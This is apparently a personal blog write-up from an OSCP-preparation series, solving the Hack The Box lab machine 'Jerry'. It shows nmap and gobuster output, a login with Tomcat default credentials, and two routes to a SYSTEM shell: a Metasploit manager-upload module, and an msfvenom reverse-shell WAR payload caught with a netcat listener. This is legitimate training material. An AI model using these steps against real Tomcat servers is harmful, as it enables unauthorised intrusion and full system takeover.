Path to OSCP: Jerry

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Jerry, starting off with the usual nmap scan (hope to do a deeper dive of nmap scanning shortly, I’m sure there are more efficient and faster nmap flags when it comes to OSCP/CTFs).

dr@nostromo:~$ sudo nmap -p- -A jerry.htb -oA nmap/jerry
[sudo] password for dr:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 15:22 BST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.038s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0
(86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   51.81 ms 10.10.14.1
2   51.95 ms jerry.htb (10.10.10.95)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.78 seconds

Just a single port open, TCP 8080 running Apache Tomcat.

I like to kick off some directory fuzzing whenever a web server is discovered. Again, something I need to look into for efficienies and how multiple tools work, but for now I instinctually kick off either ffuf or gobuster with a standard dictionary file while I perform further manual enumeration, as these scans can take quite a while to complete.

dr@nostromo:~$ gobuster dir -u http://jerry.htb:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://jerry.htb:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/13 16:12:03 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 0]
/http%3A%2F%2Fblog    (Status: 400) [Size: 0]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 0]
/External%5CX-News    (Status: 400) [Size: 0]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]
/http%3A%2F%2Fradar   (Status: 400) [Size: 0]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 0]
/http%3A%2F%2Fswik    (Status: 400) [Size: 0]
Progress: 220558 / 220561 (100.00%)
===============================================================
2023/08/13 16:29:03 Finished
===============================================================

In this case, nothing discovered that couldn’t have been found from the frontpage itself (Tomcat Web Application Manager), but at least some peace of mind that there’s unlikely to be a simple CTF-style open directory for a foothold. Looking likely that this will involve a known vulnerability related to the Apache Tomcat/Coyote JSP version.

A search on searchsploit for Apache 7.0 reveals the below as most interesting:

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass

I initially attempted manual PUT requests with Burp Suite to trigger a POC, as detailed at Apache Tomcat RCE if readonly set to false (CVE-2017-12617) – Alphabot Security, but no success. I next try the available Python script from searchsploit, 42966.py, but this also fails, with the output “Not Vulnerable to CVE-2017-12617”.

dr@nostromo:~$ python 42966.py -u http://jerry.htb:8080

  _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
 / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  | 
| |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
| |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / / 
| |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / / 
 \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/

[@intx0x80]

Poc Filename  Poc.jsp 
Not Vulnerable to CVE-2017-12617

After these failed attempts at CVE-2017-12617, it’s back to searchsploit, this time looking into Apache Manager, which throws up a few more leads:

Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) 
Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit)

Application Upload sounds promising, “used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component”.

I load up the module in Metasploit and see that it requires authentication. This leads me to attempting a few Apache Tomcat default passwords, as found here: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

I get a hit from this list, and we’re into the Tomcat Web Application Manager:

More importantly, we have all the details we need to plug into the Metasploit module, including modifying the payload for Windows:

msf6 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

  Name          Current Setting  Required  Description 
  ----          ---------------  --------  ----------- 
  HttpPassword  s3cret           no        The password for the specified username 
  HttpUsername  tomcat           no        The username to authenticate as 
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...] 
  RHOSTS        10.10.10.95      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html 
  RPORT         8080             yes       The target port (TCP) 
  SSL           false            no        Negotiate SSL/TLS for outgoing connections 
  TARGETURI     /manager/    yes       The URI path of the manager app (/html/upload and /undeploy will be used) 
  VHOST                          no        HTTP server virtual host


Payload options (windows/shell/reverse_tcp):

  Name      Current Setting  Required  Description 
  ----      ---------------  --------  ----------- 
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) 
  LHOST     10.10.14.3       yes       The listen address (an interface may be specified) 
  LPORT     7777             yes       The listen port


Exploit target:

  Id  Name 
  --  ---- 
  1   Windows Universal

We run the module, and immediately gain system access to retrieve both the user and root flags (“2 for the price of 1.txt”):

As with the previous box, this would be a waste of a Metasploit module in the actual OSCP exam, so let’s look at manual exploitation.

With access to the Manager, we can upload a malicious WAR file, and execute it in the browser to trigger a reverse shell to our system.

Using msfvenom we create the payload:

dr@nostromo:~$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=7777 -f war -o at.war
Payload size: 13318 bytes
Final size of war file: 13318 bytes
Saved as: at.war

We then upload it under the Deploy section of the Apache Tomcat Manager, which results in the below:

We set up a netcat listener on the port we specified in msfvenom, and can trigger the payload by either clicking the /at link in the above Manager window or browsing directly to http://jerry.htb:8080/at/, resulting in a system shell:

dr@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>

Leave a Reply

Your email address will not be published. Required fields are marked *